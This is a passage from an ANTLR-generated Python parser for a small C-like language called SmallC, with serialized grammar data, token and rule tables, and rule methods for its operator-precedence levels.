buf.write("\u0185\u017e\3\2\2\2\u0185\u0181\3\2\2\2\u0185\u0184\3")
buf.write("\2\2\2\u0186\67\3\2\2\2\u0187\u018f\5X-\2\u0188\u018f")
buf.write("\5`\61\2\u0189\u018f\5b\62\2\u018a\u018f\5d\63\2\u018b")
buf.write("\u018f\5f\64\2\u018c\u018f\5V,\2\u018d\u018f\5\4\3\2\u018e")
buf.write("\u0187\3\2\2\2\u018e\u0188\3\2\2\2\u018e\u0189\3\2\2\2")
buf.write("\u018e\u018a\3\2\2\2\u018e\u018b\3\2\2\2\u018e\u018c\3")
buf.write("\2\2\2\u018e\u018d\3\2\2\2\u018f9\3\2\2\2\u0190\u0191")
buf.write("\7)\2\2\u0191\u0192\7\31\2\2\u0192\u0193\58\35\2\u0193")
buf.write("\u0194\7\32\2\2\u0194\u0196\5\66\34\2\u0195\u0197\5<\37")
buf.write("\2\u0196\u0195\3\2\2\2\u0196\u0197\3\2\2\2\u0197;\3\2")
buf.write("\2\2\u0198\u0199\7*\2\2\u0199\u019a\5\66\34\2\u019a=\3")
buf.write("\2\2\2\u019b\u019c\7,\2\2\u019c\u019d\7\31\2\2\u019d\u019e")
buf.write("\58\35\2\u019e\u019f\7\32\2\2\u019f\u01a0\5\66\34\2\u01a0")
buf.write("?\3\2\2\2\u01a1\u01a2\7+\2\2\u01a2\u01a3\5\64\33\2\u01a3")
buf.write("\u01a4\7,\2\2\u01a4\u01a5\7\31\2\2\u01a5\u01a6\58\35\2")
buf.write("\u01a6\u01a7\7\32\2\2\u01a7\u01a8\7\25\2\2\u01a8A\3\2")
buf.write("\2\2\u01a9\u01aa\7-\2\2\u01aa\u01ad\7\31\2\2\u01ab\u01ae")
buf.write("\5D#\2\u01ac\u01ae\5X-\2\u01ad\u01ab\3\2\2\2\u01ad\u01ac")
buf.write("\3\2\2\2\u01ae\u01af\3\2\2\2\u01af\u01b0\7\25\2\2\u01b0")
buf.write("\u01b1\58\35\2\u01b1\u01b2\7\25\2\2\u01b2\u01b3\58\35")
buf.write("\2\u01b3\u01b4\7\32\2\2\u01b4\u01b5\5\64\33\2\u01b5C\3")
buf.write("\2\2\2\u01b6\u01b8\5F$\2\u01b7\u01b6\3\2\2\2\u01b8\u01b9")
buf.write("\3\2\2\2\u01b9\u01b7\3\2\2\2\u01b9\u01ba\3\2\2\2\u01ba")
buf.write("\u01bb\3\2\2\2\u01bb\u01c0\5J&\2\u01bc\u01bd\7\30\2\2")
buf.write("\u01bd\u01bf\5J&\2\u01be\u01bc\3\2\2\2\u01bf\u01c2\3\2")
buf.write("\2\2\u01c0\u01be\3\2\2\2\u01c0\u01c1\3\2\2\2\u01c1E\3")
buf.write("\2\2\2\u01c2\u01c0\3\2\2\2\u01c3\u01c6\5^\60\2\u01c4\u01c6")
buf.write("\5H%\2\u01c5\u01c3\3\2\2\2\u01c5\u01c4\3\2\2\2\u01c6G")
buf.write("\3\2\2\2\u01c7\u01c8\7&\2\2\u01c8I\3\2\2\2\u01c9\u01ca")
buf.write("\7\31\2\2\u01ca\u01cb\5L\'\2\u01cb\u01ce\7\32\2\2\u01cc")
buf.write("\u01cd\7\3\2\2\u01cd\u01cf\5P)\2\u01ce\u01cc\3\2\2\2\u01ce")
buf.write("\u01cf\3\2\2\2\u01cf\u01d6\3\2\2\2\u01d0\u01d3\5L\'\2")
buf.write("\u01d1\u01d2\7\3\2\2\u01d2\u01d4\5P)\2\u01d3\u01d1\3\2")
buf.write("\2\2\u01d3\u01d4\3\2\2\2\u01d4\u01d6\3\2\2\2\u01d5\u01c9")
buf.write("\3\2\2\2\u01d5\u01d0\3\2\2\2\u01d6K\3\2\2\2\u01d7\u01d8")
buf.write("\7\31\2\2\u01d8\u01d9\5L\'\2\u01d9\u01da\7\32\2\2\u01da")
buf.write("\u01e0\3\2\2\2\u01db\u01dd\5N(\2\u01dc\u01de\5\62\32\2")
buf.write("\u01dd\u01dc\3\2\2\2\u01dd\u01de\3\2\2\2\u01de\u01e0\3")
buf.write("\2\2\2\u01df\u01d7\3\2\2\2\u01df\u01db\3\2\2\2\u01e0M")
buf.write("\3\2\2\2\u01e1\u01e2\7\31\2\2\u01e2\u01e3\5N(\2\u01e3")
buf.write("\u01e4\7\32\2\2\u01e4\u01f4\3\2\2\2\u01e5\u01e7\5\60\31")
buf.write("\2\u01e6\u01e5\3\2\2\2\u01e7\u01ea\3\2\2\2\u01e8\u01e6")
buf.write("\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9\u01eb\3\2\2\2\u01ea")
buf.write("\u01e8\3\2\2\2\u01eb\u01f4\5Z.\2\u01ec\u01ee\5\60\31\2")
buf.write("\u01ed\u01ec\3\2\2\2\u01ee\u01ef\3\2\2\2\u01ef\u01ed\3")
buf.write("\2\2\2\u01ef\u01f0\3\2\2\2\u01f0\u01f1\3\2\2\2\u01f1\u01f2")
buf.write("\5L\'\2\u01f2\u01f4\3\2\2\2\u01f3\u01e1\3\2\2\2\u01f3")
buf.write("\u01e8\3\2\2\2\u01f3\u01ed\3\2\2\2\u01f4O\3\2\2\2\u01f5")
buf.write("\u01fe\7\35\2\2\u01f6\u01fb\58\35\2\u01f7\u01f8\7\30\2")
buf.write("\2\u01f8\u01fa\58\35\2\u01f9\u01f7\3\2\2\2\u01fa\u01fd")
buf.write("\3\2\2\2\u01fb\u01f9\3\2\2\2\u01fb\u01fc\3\2\2\2\u01fc")
buf.write("\u01ff\3\2\2\2\u01fd\u01fb\3\2\2\2\u01fe\u01f6\3\2\2\2")
buf.write("\u01fe\u01ff\3\2\2\2\u01ff\u0200\3\2\2\2\u0200\u0203\7")
buf.write("\36\2\2\u0201\u0203\58\35\2\u0202\u01f5\3\2\2\2\u0202")
buf.write("\u0201\3\2\2\2\u0203Q\3\2\2\2\u0204\u0206\7\60\2\2\u0205")
buf.write("\u0207\58\35\2\u0206\u0205\3\2\2\2\u0206\u0207\3\2\2\2")
buf.write("\u0207S\3\2\2\2\u0208\u020d\58\35\2\u0209\u020a\7\30\2")
buf.write("\2\u020a\u020c\58\35\2\u020b\u0209\3\2\2\2\u020c\u020f")
buf.write("\3\2\2\2\u020d\u020b\3\2\2\2\u020d\u020e\3\2\2\2\u020e")
buf.write("\u0212\3\2\2\2\u020f\u020d\3\2\2\2\u0210\u0212\3\2\2\2")
buf.write("\u0211\u0208\3\2\2\2\u0211\u0210\3\2\2\2\u0212U\3\2\2")
buf.write("\2\u0213\u0214\5Z.\2\u0214\u0215\7\31\2\2\u0215\u0216")
buf.write("\5T+\2\u0216\u0217\7\32\2\2\u0217W\3\2\2\2\u0218\u0219")
buf.write("\5Z.\2\u0219Y\3\2\2\2\u021a\u021b\7\65\2\2\u021b[\3\2")
buf.write("\2\2\u021c\u021d\7\16\2\2\u021d]\3\2\2\2\u021e\u021f\t")
buf.write("\2\2\2\u021f_\3\2\2\2\u0220\u0221\7\64\2\2\u0221a\3\2")
buf.write("\2\2\u0222\u0223\7\63\2\2\u0223c\3\2\2\2\u0224\u0225\7")
buf.write("\66\2\2\u0225e\3\2\2\2\u0226\u0227\7\67\2\2\u0227g\3\2")
buf.write("\2\2\67ox\u0082\u008d\u009f\u00a1\u00b3\u00b5\u00c3\u00c5")
buf.write("\u00d4\u00d6\u00ee\u00fa\u0105\u0107\u0110\u0112\u011c")
buf.write("\u0127\u012c\u0138\u013d\u014c\u0150\u0155\u015a\u015e")
buf.write("\u0161\u0165\u0169\u0171\u0185\u018e\u0196\u01ad\u01b9")
buf.write("\u01c0\u01c5\u01ce\u01d3\u01d5\u01dd\u01df\u01e8\u01ef")
buf.write("\u01f3\u01fb\u01fe\u0202\u0206\u020d\u0211")
return buf.getvalue()
class SmallCParser ( Parser ):
grammarFileName = "SmallC.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "'='", "'?'", "':'", "'||'", "'&&'", "'=='",
"'!='", "'<='", "'>='", "'+'", "'-'", "'*'", "'/'",
"'%'", "'++'", "'--'", "'&'", "'!'", "';'", "'#include'",
"'.'", "','", "'('", "')'", "'<'", "'>'", "'{'", "'}'",
"'['", "']'", "'\"'", "'char'", "'float'", "'int'",
"'void'", "'const'", "'volatile'", "'mutable'", "'if'",
"'else'", "'do'", "'while'", "'for'", "'break'", "'continue'",
"'return'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "COMMA", "LBRA", "RBRA",
"LABRA", "RABRA", "LCBRA", "RCBRA", "LSBRA", "RSBRA",
"QUOTE", "TYPECHAR", "TYPEFLOAT", "TYPEINT", "TYPEVOID",
"CONST", "VOLATILE", "MUTABLE", "IF", "ELSE", "DO",
"WHILE", "FOR", "BREAK", "CONTINUE", "RETURN", "COMMENT",
"MULTICOMMENT", "INTEGER", "FLOAT", "IDENTIFIER",
"CHARACTER", "STRING", "WS" ]
RULE_oplevel15 = 0
RULE_oplevel14 = 1
RULE_oplevel13 = 2
RULE_oplevel12 = 3
RULE_oplevel11 = 4
RULE_oplevel10 = 5
RULE_oplevel9 = 6
RULE_oplevel8 = 7
RULE_oplevel7 = 8
RULE_oplevel6 = 9
RULE_oplevel5 = 10
RULE_oplevel4 = 11
RULE_oplevel3 = 12
RULE_oplevel2 = 13
RULE_oplevel1 = 14
RULE_program = 15
RULE_include = 16
RULE_stdInclude = 17
RULE_customInclude = 18
RULE_functionDeclaration = 19
RULE_functionDefinition = 20
RULE_parameters = 21
RULE_parameter = 22
RULE_pointerPart = 23
RULE_arrayPart = 24
RULE_statements = 25
RULE_statement = 26
RULE_expression = 27
RULE_ifCond = 28
RULE_elseCond = 29
RULE_whileCond = 30
RULE_doWhileCond = 31
RULE_forLoop = 32
RULE_variableDeclaration = 33
RULE_declarationSpecifier = 34
RULE_cvQualifier = 35
RULE_declaratorInitializer = 36
RULE_declarator1 = 37
RULE_declarator2 = 38
RULE_initializer = 39
RULE_returnStmt = 40
RULE_arguments = 41
RULE_functionCall = 42
RULE_variable = 43
RULE_identifier = 44
RULE_pointer = 45
RULE_typeDeclaration = 46
RULE_floatLiteral = 47
RULE_integerLiteral = 48
RULE_characterLiteral = 49
RULE_stringLiteral = 50
ruleNames = [ "oplevel15", "oplevel14", "oplevel13", "oplevel12", "oplevel11",
"oplevel10", "oplevel9", "oplevel8", "oplevel7", "oplevel6",
"oplevel5", "oplevel4", "oplevel3", "oplevel2", "oplevel1",
"program", "include", "stdInclude", "customInclude",
"functionDeclaration", "functionDefinition", "parameters",
"parameter", "pointerPart", "arrayPart", "statements",
"statement", "expression", "ifCond", "elseCond", "whileCond",
"doWhileCond", "forLoop", "variableDeclaration", "declarationSpecifier",
"cvQualifier", "declaratorInitializer", "declarator1",
"declarator2", "initializer", "returnStmt", "arguments",
"functionCall", "variable", "identifier", "pointer",
"typeDeclaration", "floatLiteral", "integerLiteral",
"characterLiteral", "stringLiteral" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
COMMA=22
LBRA=23
RBRA=24
LABRA=25
RABRA=26
LCBRA=27
RCBRA=28
LSBRA=29
RSBRA=30
QUOTE=31
TYPECHAR=32
TYPEFLOAT=33
TYPEINT=34
TYPEVOID=35
CONST=36
VOLATILE=37
MUTABLE=38
IF=39
ELSE=40
DO=41
WHILE=42
FOR=43
BREAK=44
CONTINUE=45
RETURN=46
COMMENT=47
MULTICOMMENT=48
INTEGER=49
FLOAT=50
IDENTIFIER=51
CHARACTER=52
STRING=53
WS=54
def __init__(self, input:TokenStream):
super().__init__(input)
self.checkVersion("4.5.3")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
class Oplevel15Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel14(self):
return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel15
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel15" ):
listener.enterOplevel15(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel15" ):
listener.exitOplevel15(self)
def oplevel15(self):
localctx = SmallCParser.Oplevel15Context(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_oplevel15)
try:
self.enterOuterAlt(localctx, 1)
self.state = 102
self.oplevel14()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel14Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel13(self):
return self.getTypedRuleContext(SmallCParser.Oplevel13Context,0)
def oplevel14(self):
return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel14
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel14" ):
listener.enterOplevel14(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel14" ):
listener.exitOplevel14(self)
def oplevel14(self):
localctx = SmallCParser.Oplevel14Context(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_oplevel14)
try:
self.state = 109
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,0,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 104
self.oplevel13()
self.state = 105
self.match(SmallCParser.T__0)
self.state = 106
self.oplevel14()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 108
self.oplevel13()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel13Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel12(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.Oplevel12Context)
else:
return self.getTypedRuleContext(SmallCParser.Oplevel12Context,i)
def oplevel13(self):
return self.getTypedRuleContext(SmallCParser.Oplevel13Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel13
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel13" ):
listener.enterOplevel13(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel13" ):
listener.exitOplevel13(self)
def oplevel13(self):
localctx = SmallCParser.Oplevel13Context(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_oplevel13)
try:
self.state = 118
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,1,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 111
self.oplevel12(0)
self.state = 112
self.match(SmallCParser.T__1)
self.state = 113
self.oplevel12(0)
self.state = 114
self.match(SmallCParser.T__2)
self.state = 115
self.oplevel13()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 117
self.oplevel12(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel12Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel11(self):
return self.getTypedRuleContext(SmallCParser.Oplevel11Context,0)
def oplevel12(self):
return self.getTypedRuleContext(SmallCParser.Oplevel12Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel12
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel12" ):
listener.enterOplevel12(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel12" ):
listener.exitOplevel12(self)
def oplevel12(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel12Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 6
self.enterRecursionRule(localctx, 6, self.RULE_oplevel12, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 121
self.oplevel11(0)
self._ctx.stop = self._input.LT(-1)
self.state = 128
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = SmallCParser.Oplevel12Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel12)
self.state = 123
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 124
self.match(SmallCParser.T__3)
self.state = 125
self.oplevel11(0)
self.state = 130
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel11Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel7(self):
return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)
def oplevel11(self):
return self.getTypedRuleContext(SmallCParser.Oplevel11Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel11
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel11" ):
listener.enterOplevel11(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel11" ):
listener.exitOplevel11(self)
def oplevel11(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel11Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 8
self.enterRecursionRule(localctx, 8, self.RULE_oplevel11, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 132
self.oplevel7(0)
self._ctx.stop = self._input.LT(-1)
self.state = 139
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,3,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = SmallCParser.Oplevel11Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel11)
self.state = 134
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 135
self.match(SmallCParser.T__4)
self.state = 136
self.oplevel7(0)
self.state = 141
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,3,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel10Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel9(self):
return self.getTypedRuleContext(SmallCParser.Oplevel9Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel10
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel10" ):
listener.enterOplevel10(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel10" ):
listener.exitOplevel10(self)
def oplevel10(self):
localctx = SmallCParser.Oplevel10Context(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_oplevel10)
try:
self.enterOuterAlt(localctx, 1)
self.state = 142
self.oplevel9()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel9Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel8(self):
return self.getTypedRuleContext(SmallCParser.Oplevel8Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel9
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel9" ):
listener.enterOplevel9(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel9" ):
listener.exitOplevel9(self)
def oplevel9(self):
localctx = SmallCParser.Oplevel9Context(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_oplevel9)
try:
self.enterOuterAlt(localctx, 1)
self.state = 144
self.oplevel8()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel8Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel7(self):
return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel8
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel8" ):
listener.enterOplevel8(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel8" ):
listener.exitOplevel8(self)
def oplevel8(self):
localctx = SmallCParser.Oplevel8Context(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_oplevel8)
try:
self.enterOuterAlt(localctx, 1)
self.state = 146
self.oplevel7(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel7Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel6(self):
return self.getTypedRuleContext(SmallCParser.Oplevel6Context,0)
def oplevel7(self):
return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel7
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel7" ):
listener.enterOplevel7(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel7" ):
listener.exitOplevel7(self)
def oplevel7(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel7Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 16
self.enterRecursionRule(localctx, 16, self.RULE_oplevel7, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 149
self.oplevel6(0)
self._ctx.stop = self._input.LT(-1)
self.state = 159
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 157
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
self.state = 151
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 152
self.match(SmallCParser.T__5)
self.state = 153
self.oplevel6(0)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
self.state = 154
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 155
self.match(SmallCParser.T__6)
self.state = 156
self.oplevel6(0)
pass
self.state = 161
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel6Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel4(self):
return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)
def oplevel6(self):
return self.getTypedRuleContext(SmallCParser.Oplevel6Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel6
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel6" ):
listener.enterOplevel6(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel6" ):
listener.exitOplevel6(self)
def oplevel6(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel6Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 18
self.enterRecursionRule(localctx, 18, self.RULE_oplevel6, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 163
self.oplevel4(0)
self._ctx.stop = self._input.LT(-1)
self.state = 179
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,7,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 177
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,6,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 165
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 166
self.match(SmallCParser.LABRA)
self.state = 167
self.oplevel4(0)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 168
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 169
self.match(SmallCParser.T__7)
self.state = 170
self.oplevel4(0)
pass
elif la_ == 3:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 171
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 172
self.match(SmallCParser.RABRA)
self.state = 173
self.oplevel4(0)
pass
elif la_ == 4:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 174
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 175
self.match(SmallCParser.T__8)
self.state = 176
self.oplevel4(0)
pass
self.state = 181
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,7,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel5Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel4(self):
return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel5
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel5" ):
listener.enterOplevel5(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel5" ):
listener.exitOplevel5(self)
def oplevel5(self):
localctx = SmallCParser.Oplevel5Context(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_oplevel5)
try:
self.enterOuterAlt(localctx, 1)
self.state = 182
self.oplevel4(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel4Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel3(self):
return self.getTypedRuleContext(SmallCParser.Oplevel3Context,0)
def oplevel4(self):
return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel4
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel4" ):
listener.enterOplevel4(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel4" ):
listener.exitOplevel4(self)
def oplevel4(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel4Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 22
self.enterRecursionRule(localctx, 22, self.RULE_oplevel4, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 185
self.oplevel3(0)
self._ctx.stop = self._input.LT(-1)
self.state = 195
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,9,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 193
